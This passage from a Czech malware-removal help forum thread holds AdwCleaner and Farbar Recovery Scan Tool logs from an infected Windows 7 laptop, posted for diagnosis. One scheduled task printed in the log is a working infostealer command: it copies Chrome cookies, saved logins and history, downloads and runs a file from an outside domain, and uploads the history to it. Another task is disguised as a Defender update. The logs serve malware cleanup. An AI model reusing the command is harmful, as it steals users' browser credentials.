Deleted Preinstalled.CyberLinkLabelPrint Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\InstallShield_{C59C179C-668D-49A9-B6EA-0121CCFC1243}
Deleted Preinstalled.CyberLinkLabelPrint Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{C59C179C-668D-49A9-B6EA-0121CCFC1243}
Deleted Preinstalled.LenovoPower2Go Registry HKLM\Software\Wow6432Node\\Microsoft\Shared Tools\MSConfig\startupreg\CLMLServer
Deleted Preinstalled.LenovoPower2Go Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Run|UpdateP2GoShortCut
Deleted Preinstalled.LenovoPower2Go Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\InstallShield_{40BF1E83-20EB-11D8-97C5-0009C5020658}
Deleted Preinstalled.LenovoPower2Go Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{40BF1E83-20EB-11D8-97C5-0009C5020658}


*************************

[+] Delete Tracing Keys
[+] Reset Winsock

*************************

AdwCleaner[S00].txt - [5170 octets] - [26/10/2021 17:59:00]

########## EOF - C:\AdwCleaner\Logs\AdwCleaner[C00].txt ##########

Re: neplatné certifikaty v prohližečích

Napsal: 26 říj 2021 17:57
od Rudy
OK. Dejte nové logy FRST+Addition.

Re: neplatné certifikaty v prohližečích

Napsal: 26 říj 2021 19:03
od Eddydye
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 20-10-2021
Ran by PC (administrator) on PC-PC (ASUSTeK Computer Inc. K50IJ) (26-10-2021 19:54:24)
Running from C:\Users\PC\Desktop
Loaded Profiles: PC
Platform: Microsoft Windows 7 Home Premium (X64) Language: Čeština (Česká republika)
Default browser: IE
Boot Mode: Normal

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

() [File not signed] C:\Program Files (x86)\ASUS\Wireless Console 3\wcourier.exe
() [File not signed] C:\Program Files\ATKGFNEX\GFNEXSrv.exe
() [File not signed] C:\ProgramData\SoundFlowPicker\SoundFlowPicker.exe
(AlcorMicro Co., Ltd.) [File not signed] C:\Program Files (x86)\AmIcoSingLun\AmIcoSinglun64.exe
(ASUS) [File not signed] C:\Program Files (x86)\ASUS\ATK Media\DMedia.exe
(ASUSTeK Computer Inc. -> ) C:\Program Files (x86)\ASUS\ATK Hotkey\Atouch64.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\ASUS CopyProtect\ASPG.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\ATK Hotkey\AsLdrSrv.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\ATK Hotkey\ATKOSD.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\ATK Hotkey\HControl.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\ATK Hotkey\HControlUser.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\ATK Hotkey\KBFiltr.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\ATK Hotkey\WDC.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\ATKOSD2\ATKOSD2.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\SmartLogon\sensorsrv.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\SmartLogon\smartlogon.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Windows\AsScrPro.exe
(ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.) C:\Windows\System32\FBAgent.exe
(ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.) C:\Windows\SysWOW64\Fast Boot\FastBootAgent.exe
(ASUSTeK Computer Inc. -> ATK) C:\Program Files\P4G\BatteryLife.exe
(ELAN Microelectronics Corporation -> ELAN Microelectronic Corp.) C:\Program Files\Elantech\ETDCtrl.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.112\GoogleCrashHandler.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.112\GoogleCrashHandler64.exe
(Google LLC -> Google LLC) C:\Users\PC\AppData\Local\Google\Update\1.3.36.112\GoogleCrashHandler.exe
(Google LLC -> Google LLC) C:\Users\PC\AppData\Local\Google\Update\1.3.36.112\GoogleCrashHandler64.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\igfxpers.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\igfxtray.exe
(Microsoft Corporation -> Microsoft Corp.) C:\Program Files (x86)\Microsoft\Search Enhancement Pack\SeaPort\SeaPort.exe
(Microsoft Windows -> Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Trend Micro, Inc. -> Trend Micro Inc.) C:\Program Files\Trend Micro\BM\TMBMSRV.exe
(Trend Micro, Inc. -> Trend Micro Inc.) C:\Program Files\Trend Micro\Internet Security\SfCtlCom.exe
(Trend Micro, Inc. -> Trend Micro Inc.) C:\Program Files\Trend Micro\Internet Security\TmProxy.exe
(Trend Micro, Inc. -> Trend Micro Inc.) C:\Program Files\Trend Micro\Internet Security\UfSeAgnt.exe
(VIA) [File not signed] C:\Program Files (x86)\VIA\VIAudioi\VDeck\VDECK.EXE

==================== Registry (Whitelisted) ===================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [UfSeAgnt.exe] => C:\Program Files\Trend Micro\Internet Security\UfSeAgnt.exe [1022368 2009-08-22] (Trend Micro, Inc. -> Trend Micro Inc.)
HKLM\...\Run: [AmIcoSinglun64] => C:\Program Files (x86)\AmIcoSingLun\AmIcoSinglun64.exe [320000 2009-04-09] (AlcorMicro Co., Ltd.) [File not signed]
HKLM\...\Run: [ETDWare] => C:\Program Files\Elantech\ETDCtrl.exe [619392 2009-06-12] (ELAN Microelectronics Corporation -> ELAN Microelectronic Corp.)
HKLM-x32\...\Run: [HDAudDeck] => C:\Program Files (x86)\VIA\VIAudioi\VDeck\VDeck.exe [2244096 2009-07-13] (VIA) [File not signed]
HKLM-x32\...\Run: [HControlUser] => C:\Program Files (x86)\ASUS\ATK Hotkey\HControlUser.exe [105016 2009-06-19] (ASUSTeK Computer Inc. -> ASUS)
HKLM-x32\...\Run: [ATKOSD2] => C:\Program Files (x86)\ASUS\ATKOSD2\ATKOSD2.exe [8493624 2009-07-07] (ASUSTeK Computer Inc. -> ASUS)
HKLM-x32\...\Run: [ATKMEDIA] => C:\Program Files (x86)\ASUS\ATK Media\DMedia.exe [159744 2009-04-20] (ASUS) [File not signed]
HKLM-x32\...\Run: [Setwallpaper] => c:\programdata\SetWallpaper.cmd
HKLM-x32\...\Run: [GrooveMonitor] => C:\Program Files (x86)\Microsoft Office\Office12\GrooveMonitor.exe [31016 2006-10-27] (Microsoft Corporation -> Microsoft Corporation)
HKU\S-1-5-21-1878501408-2484808434-785971923-1000\...\Run: [Google Update] => C:\Users\PC\AppData\Local\Google\Update\1.3.36.112\GoogleUpdateCore.exe [223816 2021-10-11] (Google LLC -> Google LLC)
HKLM\...\Windows x64\Print Processors\Canon MP250 series Print Processor: C:\Windows\System32\spool\prtprocs\x64\CNMPD9W.DLL [28672 2010-04-24] (Microsoft Windows Hardware Compatibility Publisher -> CANON INC.)
HKLM\...\Print\Monitors\Canon BJ Language Monitor MP250 series: C:\Windows\system32\CNMLM9W.DLL [336896 2010-04-24] (Microsoft Windows Hardware Compatibility Publisher -> CANON INC.)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files\Google\Chrome\Application\95.0.4638.54\Installer\chrmstp.exe [2021-10-25] (Google LLC -> Google LLC) [File not signed]
HKLM\Software\...\Authentication\Credential Providers: [{06FE45A8-6D92-44ba-A0F1-9A9BCDC8F5A7}] -> C:\Program Files (x86)\ASUS\SmartLogon\system\FaceCredentialProvider64.dll [2009-05-01] (ASUS) [File not signed]
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\FancyStart daemon.lnk [2009-10-06]
ShortcutTarget: FancyStart daemon.lnk -> C:\Windows\Installer\{60D6618B-153F-4353-8185-908E676E5888}\_DCE9A4DB2A5F2786140FA3.exe () [File not signed]
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\tmchlang.lnk [2009-10-06]
ShortcutTarget: tmchlang.lnk -> C:\Program Files\Trend Micro\Internet Security\TmChLang.exe (Trend Micro, Inc. -> Trend Micro Inc.)
HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION

==================== Scheduled Tasks (Whitelisted) ============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {2C093763-EE42-49CF-8891-F189A4AB542C} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1878501408-2484808434-785971923-1000Core => C:\Users\PC\AppData\Local\Google\Update\GoogleUpdate.exe [154440 2021-02-16] (Google LLC -> Google LLC)
Task: {326F35B1-9030-43D1-BD0D-5DBD49CECAFF} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156232 2021-10-25] (Google LLC -> Google LLC)
Task: {3BA45A0D-24F6-4688-84BE-D1EA203FDFE0} - System32\Tasks\WC3 => C:\Program Files (x86)\ASUS\Wireless Console 3\wcourier.exe [1593344 2009-07-24] () [File not signed]
Task: {4CDF81D0-F7E2-48C8-817A-A530B90DD8DF} - System32\Tasks\Microsoft Windows Defender Update => C:\Program Files (x86)\Rezhabeck\mp3RenamerPro\mp3RenamerPro.exe
Task: {6E64456A-0201-4D80-BB77-5184B428C4FA} - System32\Tasks\Check Volumes => C:\Windows\SYSTEM32\CMD.EXE /C copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Cookies" "C:\Users\PC\AppData\Local\Temp\DYY04N8UKN" > NUL && copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\PC\AppData\Local\Temp\1Q541DFWIX" > NUL && copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Local State" "C:\Users\PC\AppData\Local\Temp\OEROW4YA69" > NUL && "C:\Users\PC\AppData\Local\Temp\OR0HXXB6JC.exe" http://1oivviovidwopopin.info/f2/OSJPN1IXJW.exe -s -k -o "C:\Users\PC\AppData\Local\Temp\OSJPN1IXJW.exe" && cd C:\Users\PC\AppData\Local\Temp\ && "OSJPN1IXJW.exe" V04J2WGO4Hf2 DYY04N8UKN 1Q541DFWIX OEROW4YA69 & copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\History" "C:\Users\PC\AppData\Local\Temp\J1O2156BEB" > NUL && cd C:\Users\PC\AppData\Local\Temp\ && "C:\Users\PC\AppData\Local\Temp\OR0HXXB6JC.exe" -X POST -H "Content-type: application/octet-stream" --data @J1O2156BEB http://1oivviovidwopopin.info/h -> /C copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Cookies" "C:\Users\PC\AppData\Local\Temp\DYY04N8UKN" > NUL && copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\PC\AppData\Local\Temp\1Q541DFWIX" > NUL && copy /Y /B "C:\Users\PC\AppDa (the data entry has 678 more characters). <==== ATTENTION
Task: {74344F07-42C6-4622-9312-152A6B0AECFF} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1878501408-2484808434-785971923-1000UA => C:\Users\PC\AppData\Local\Google\Update\GoogleUpdate.exe [154440 2021-02-16] (Google LLC -> Google LLC)
Task: {7A61CC45-675A-42D9-BC0A-D3691F5842ED} - System32\Tasks\ASUS SmartLogon Console Sensor => C:\Program Files (x86)\ASUS\SmartLogon\sensorsrv.exe [305720 2009-05-19] (ASUSTeK Computer Inc. -> ASUS)
Task: {CA21A731-91AF-4714-8E6F-CFE619DD08A0} - System32\Tasks\Games\UpdateCheck_S-1-5-21-1878501408-2484808434-785971923-1000 => {CA22F5B1-E06F-4A2B-94FC-21E87FE53781} C:\Windows\System32\gameux.dll [2746368 2009-07-14] (Microsoft Windows -> Microsoft Corporation)
Task: {E24D73D5-BC2A-4F11-90B0-83E312366154} - System32\Tasks\ASUS P4G => C:\Program Files\P4G\BatteryLife.exe [267832 2009-07-29] (ASUSTeK Computer Inc. -> ATK)
Task: {F53D1F2C-4DBF-4EB4-9E7F-45350BE21FBF} - System32\Tasks\ASPG => C:\Program Files (x86)\ASUS\ASUS CopyProtect\aspg.exe [163384 2009-06-29] (ASUSTeK Computer Inc. -> ASUS)
Task: {FF6375C1-1AC9-466C-80D7-F1443D3F6986} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156232 2021-10-25] (Google LLC -> Google LLC)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)


==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 78.157.167.7 78.157.167.57
Tcpip\..\Interfaces\{6FBAB886-4307-4726-B9CB-F48F3A217E2B}: [DhcpNameServer] 78.157.167.7 78.157.167.57

FireFox:
========
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32.dll [No File]
FF Plugin-x32: @microsoft.com/OfficeLive,version=1.3 -> C:\Program Files (x86)\Microsoft\Office Live\npOLW.dll [2008-11-13] (Microsoft Corporation -> Microsoft Corp.)
FF Plugin-x32: @microsoft.com/WLPG,version=14.0.8051.1204 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2008-12-04] (Microsoft Corporation -> Microsoft Corporation)

Chrome:
=======
CHR Profile: C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default [2021-10-26]
CHR Notifications: Default -> hxxps//tadesco.org
CHR Extension: (Prezentace) - C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2021-01-03]
CHR Extension: (Dokumenty) - C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2021-01-03]
CHR Extension: (Disk Google) - C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2021-01-03]
CHR Extension: (YouTube) - C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2021-01-03]
CHR Extension: (Tabulky) - C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2021-01-03]
CHR Extension: (Dokumenty Google offline) - C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2021-10-25]
CHR Extension: (Platby Internetového obchodu Chrome) - C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2021-01-29]
CHR Extension: (Gmail) - C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2021-01-03]

==================== Services (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 ATKGFNEXSrv; C:\Program Files\ATKGFNEX\GFNEXSrv.exe [94208 2007-08-08] () [File not signed]
R2 FastBootAgent; C:\Windows\SysWOW64\Fast Boot\FastBootAgent.exe [306232 2009-07-24] (ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.)
S3 GoogleChromeElevationService; C:\Program Files\Google\Chrome\Application\95.0.4638.54\elevation_service.exe [1480024 2021-10-16] (Google LLC -> Google LLC) [File not signed]
R2 SfCtlCom; C:\Program Files\Trend Micro\Internet Security\SfCtlCom.exe [838528 2009-08-22] (Trend Micro, Inc. -> Trend Micro Inc.)
R2 SoundFlowPicker; C:\ProgramData\SoundFlowPicker\SoundFlowPicker.exe [1064960 2021-07-05] () [File not signed] <==== ATTENTION
R3 TMBMServer; C:\Program Files\Trend Micro\BM\TMBMSRV.exe [570632 2009-08-22] (Trend Micro, Inc. -> Trend Micro Inc.)
R3 TmProxy; C:\Program Files\Trend Micro\Internet Security\TmProxy.exe [917768 2009-08-22] (Trend Micro, Inc. -> Trend Micro Inc.)
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2009-07-14] (Microsoft Windows -> Microsoft Corporation)

===================== Drivers (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 ASMMAP64; C:\Program Files\ATKGFNEX\ASMMAP64.sys [14904 2007-07-24] (ASUSTeK Computer Inc. -> )
R3 athr; C:\Windows\System32\DRIVERS\athrx.sys [1394688 2009-06-20] (Microsoft Windows -> Atheros Communications, Inc.)
R3 ETD; C:\Windows\System32\DRIVERS\ETD.sys [112128 2009-06-12] (Microsoft Windows Hardware Compatibility Publisher -> ELAN Microelectronic Corp.)
R3 kbfiltr; C:\Windows\System32\DRIVERS\kbfiltr.sys [15416 2009-07-20] (ASUSTeK Computer Inc. -> )
R3 L1E; C:\Windows\System32\DRIVERS\L1E62x64.sys [55296 2009-06-09] (Microsoft Windows Hardware Compatibility Publisher -> Atheros Communications, Inc.)
R0 lullaby; C:\Windows\System32\DRIVERS\lullaby.sys [15928 2009-06-18] (ASUSTeK Computer Inc. -> Windows (R) Win 7 DDK provider)
R3 SNP2UVC; C:\Windows\System32\DRIVERS\snp2uvc.sys [1806400 2009-06-05] (SONIX TECHNOLOGY CO. , LTD -> )
R3 tmpreflt; C:\Windows\System32\DRIVERS\tmpreflt.sys [42000 2009-08-22] (Trend Micro, Inc. -> Trend Micro Inc.)
R1 tmtdi; C:\Windows\System32\DRIVERS\tmtdi.sys [107536 2009-08-22] (Trend Micro, Inc. -> Trend Micro Inc.)
R3 tmxpflt; C:\Windows\System32\DRIVERS\tmxpflt.sys [258064 2009-08-22] (Trend Micro, Inc. -> Trend Micro Inc.)
R3 vsapint; C:\Windows\System32\DRIVERS\vsapint.sys [1883152 2009-08-22] (Trend Micro, Inc. -> Trend Micro Inc.)
U3 tmlwf; no ImagePath
U3 tmwfp; no ImagePath

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One month (created) (Whitelisted) =========

(If an entry is included in the fixlist, the file/folder will be moved.)

2021-10-26 17:58 - 2021-10-26 18:00 - 000000000 ____D C:\AdwCleaner
2021-10-26 17:57 - 2021-10-26 17:57 - 008553680 _____ (Malwarebytes) C:\Users\PC\Desktop\AdwCleaner.exe
2021-10-26 16:52 - 2021-10-26 17:02 - 000028575 _____ C:\Users\PC\Desktop\Addition.txt
2021-10-26 16:47 - 2021-10-26 19:55 - 000015741 _____ C:\Users\PC\Desktop\FRST.txt
2021-10-26 16:47 - 2021-10-26 19:54 - 000000000 ____D C:\FRST
2021-10-26 16:42 - 2021-10-26 16:42 - 002310656 _____ (Farbar) C:\Users\PC\Desktop\FRST64.exe
2021-10-25 16:56 - 2021-10-25 16:56 - 000002244 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2021-10-25 16:56 - 2021-10-25 16:56 - 000002203 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2021-10-25 16:55 - 2021-10-25 16:55 - 000003388 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineUA
2021-10-25 16:55 - 2021-10-25 16:55 - 000003260 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineCore
2021-10-11 16:33 - 2021-10-11 16:33 - 001341272 _____ (Google LLC) C:\Users\PC\Downloads\ChromeSetup.exe

==================== One month (modified) ==================

(If an entry is included in the fixlist, the file/folder will be moved.)

2021-10-26 19:57 - 2021-08-05 15:40 - 000000824 _____ C:\Windows\system32\Drivers\etc\tmvsthfud.bin
2021-10-26 19:57 - 2021-08-05 15:40 - 000000824 _____ C:\Windows\system32\Drivers\etc\tmvsthfss.bin
2021-10-26 19:57 - 2021-07-13 16:04 - 000000004 _____ C:\ProgramData\rc.dat
2021-10-26 19:12 - 2021-07-13 16:03 - 000000004 _____ C:\ProgramData\lock.dat
2021-10-26 19:03 - 2009-07-14 06:45 - 000010016 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2021-10-26 19:03 - 2009-07-14 06:45 - 000010016 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2021-10-26 19:00 - 2021-01-03 19:43 - 000000000 ____D C:\Program Files (x86)\Google
2021-10-26 18:57 - 2021-07-13 16:03 - 000000060 _____ C:\ProgramData\lir.bats
2021-10-26 18:55 - 2009-07-14 07:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2021-10-26 18:00 - 2009-10-06 11:32 - 000000000 ____D C:\Program Files (x86)\ASUS
2021-10-26 18:00 - 2009-10-06 11:16 - 000000000 ____D C:\Program Files (x86)\CyberLink
2021-10-26 17:51 - 2021-02-16 16:18 - 000002403 _____ C:\Users\PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2021-10-26 17:51 - 2021-02-16 16:18 - 000002366 _____ C:\Users\PC\Desktop\Google Chrome.lnk
2021-10-26 16:38 - 2009-07-14 05:20 - 000000000 ____D C:\Windows\system32\NDF
2021-10-25 17:06 - 2009-10-06 11:35 - 000001145 _____ C:\Windows\system32\ServiceFilter.ini
2021-10-11 16:05 - 2021-02-16 16:16 - 000003558 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskUserS-1-5-21-1878501408-2484808434-785971923-1000UA
2021-10-11 16:05 - 2021-02-16 16:16 - 000003286 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskUserS-1-5-21-1878501408-2484808434-785971923-1000Core

==================== Files in the root of some directories ========

2021-07-13 16:03 - 2021-10-26 19:12 - 000000004 _____ () C:\ProgramData\lock.dat
2021-07-13 16:04 - 2021-10-26 19:57 - 000000004 _____ () C:\ProgramData\rc.dat
2021-07-13 16:03 - 2021-07-13 16:03 - 000000008 _____ () C:\ProgramData\ts.dat
2007-06-12 18:34 - 2007-06-12 18:34 - 000035822 _____ () C:\Program Files (x86)\Common Files\ASPG_icon.ico
2008-05-22 17:35 - 2008-05-22 17:35 - 000051962 _____ () C:\Program Files (x86)\Common Files\banner.jpg
2009-04-08 19:31 - 2009-04-08 19:31 - 000106496 _____ () C:\Program Files (x86)\Common Files\CPInstallAction.dll
2008-08-12 06:45 - 2008-08-12 06:45 - 000155648 _____ (ASUS) C:\Program Files (x86)\Common Files\MSIactionall.dll

==================== SigCheck ============================

(There is no automatic fix for files that do not pass verification.)


LastRegBack: 2021-03-31 16:37
==================== End of FRST.txt ========================


Additional scan result of Farbar Recovery Scan Tool (x64) Version: 20-10-2021
Ran by PC (26-10-2021 19:58:06)
Running from C:\Users\PC\Desktop
Microsoft Windows 7 Home Premium (X64) (2021-01-03 17:28:21)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================


(If an entry is included in the fixlist, it will be removed.)

Administrator (S-1-5-21-1878501408-2484808434-785971923-500 - Administrator - Disabled)
Guest (S-1-5-21-1878501408-2484808434-785971923-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1878501408-2484808434-785971923-1002 - Limited - Enabled)
PC (S-1-5-21-1878501408-2484808434-785971923-1000 - Administrator - Enabled) => C:\Users\PC

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Trend Micro Internet Security (Enabled - Up to date) {48929DFC-7A52-A34F-8351-C4DBEDBD9C50}
AS: Trend Micro Internet Security (Enabled - Up to date) {F3F37C18-5C68-ACC1-B9E1-FFA9963AD6ED}
AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Acrobat.com (HKLM-x32\...\{287ECFA4-719A-2143-A09B-D6A12DE54E40}) (Version: 1.6.65 - Adobe Systems Incorporated)
Activation Assistant for the 2007 Microsoft Office suites (HKLM-x32\...\Activation Assistant for the 2007 Microsoft Office suites) (Version: - Microsoft Corporation)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 1.5.0.7220 - Adobe Systems Inc.)
Adobe Flash Player 10 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 10.0.32.18 - Adobe Systems Incorporated)
Adobe Flash Player 10 Plugin (HKLM-x32\...\Adobe Flash Player Plugin) (Version: 10.0.32.18 - Adobe Systems Incorporated)
Adobe Reader 9.1 MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-A91000000001}) (Version: 9.1.0 - Adobe Systems Incorporated)
Alcor Micro USB Card Reader (HKLM-x32\...\InstallShield_{5A22D889-FBDD-4AE8-86EC-089D45FC133E}) (Version: 1.2.17.25001 - Alcor Micro Corp.)
Asistent pro přihlášení ke službě Windows Live (HKLM-x32\...\{1E779810-ACCA-4483-BC76-12DFE055B452}) (Version: 5.000.817.1 - Microsoft Corporation)
ASUS AI Recovery (HKLM-x32\...\{06585B02-F20D-4AB2-9A64-86EF2AE0F8F0}) (Version: 1.0.6 - ASUS)
ASUS CopyProtect (HKLM-x32\...\{6B77A7F6-DD63-4F13-A6FF-83137A5AC354}) (Version: 1.0.0015 - ASUS)
ASUS FancyStart (HKLM-x32\...\{60D6618B-153F-4353-8185-908E676E5888}) (Version: 1.0.5 - ASUSTeK Computer Inc.)
ASUS LifeFrame3 (HKLM-x32\...\{1DBD1F12-ED93-49C0-A7CC-56CBDE488158}) (Version: 3.0.20 - ASUS)
ASUS Live Update (HKLM-x32\...\{E657B243-9AD4-4ECC-BE81-4CCF8D667FD0}) (Version: 2.5.9 - ASUS)
ASUS MultiFrame (HKLM-x32\...\{9D48531D-2135-49FC-BC29-ACCDA5396A76}) (Version: 1.0.0019 - ASUS)
ASUS Power4Gear Hybrid (HKLM\...\{1686C4D1-B1FD-42E8-B7A8-FB4C4DBA5BA8}) (Version: 1.1.19 - ASUS)
ASUS SmartLogon (HKLM-x32\...\{64452561-169F-4A36-A2FF-B5E118EC65F5}) (Version: 1.0.0007 - ASUS)
Asus_Camera_ScreenSaver (HKLM-x32\...\Asus_Camera_ScreenSaver) (Version: 2.0.0009 - ASUS)
Atheros Communications Inc.(R) AR8121/AR8113/AR8114 Gigabit/Fast Ethernet Driver (HKLM-x32\...\{3108C217-BE83-42E4-AE9E-A56A2A92E549}) (Version: 1.0.0.16 - Atheros Communications Inc.)
ATK Generic Function Service (HKLM-x32\...\{D3D54F3E-C5C3-443D-978F-87A72E5616E8}) (Version: 1.00.0008 - ATK)
ATK Hotkey (HKLM-x32\...\{7C05592D-424B-46CB-B505-E0013E8E75C9}) (Version: 1.0.0051 - ASUS)
ATK Media (HKLM-x32\...\{D1E5870E-E3E5-4475-98A6-ADD614524ADF}) (Version: 2.0.0005 - ASUS)
ATKOSD2 (HKLM-x32\...\{3B05F2FB-745B-4012-ADF2-439F36B2E70B}) (Version: 7.0.0005 - ASUS)
Canon MP250 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MP250_series) (Version: - Canon Inc.)
ETDWare PS/2-x64 7.0.5.5_WHQL (HKLM\...\Elantech) (Version: - )
Fast Boot (HKLM\...\{13F4A7F3-EABC-4261-AF6B-1317777F0755}) (Version: 1.0.3 - ASUS)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 95.0.4638.54 - Google LLC)
Google Chrome (HKU\S-1-5-21-1878501408-2484808434-785971923-1000\...\Google Chrome) (Version: 95.0.4638.54 - Google LLC)
Choice Guard (HKLM-x32\...\{8FFC5648-FAF8-43A3-BC8F-42BA1E275C4E}) (Version: 1.2.87.0 - Microsoft Corporation) Hidden
Intel(R) Graphics Media Accelerator Driver (HKLM\...\HDMI) (Version: - Intel Corporation)
Junk Mail filter update (HKLM-x32\...\{4AB8B41B-3AF1-46BE-99B0-0ACD3B300C0A}) (Version: 14.0.8050.1202 - Microsoft Corporation) Hidden
Microsoft Office Enterprise 2007 (HKLM-x32\...\ENTERPRISE) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft Office Live Add-in 1.3 (HKLM-x32\...\{57F0ED40-8F11-41AA-B926-4A66D0D1A9CC}) (Version: 2.0.2313.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Sync Framework Runtime Native v1.0 (x86) (HKLM-x32\...\{8A74E887-8F0F-4017-AF53-CBA42211AAA5}) (Version: 1.0.1215.0 - Microsoft Corporation)
Microsoft Sync Framework Services Native v1.0 (x86) (HKLM-x32\...\{BD64AF4A-8C80-4152-AD77-FCDDF05208AB}) (Version: 1.0.1215.0 - Microsoft Corporation)
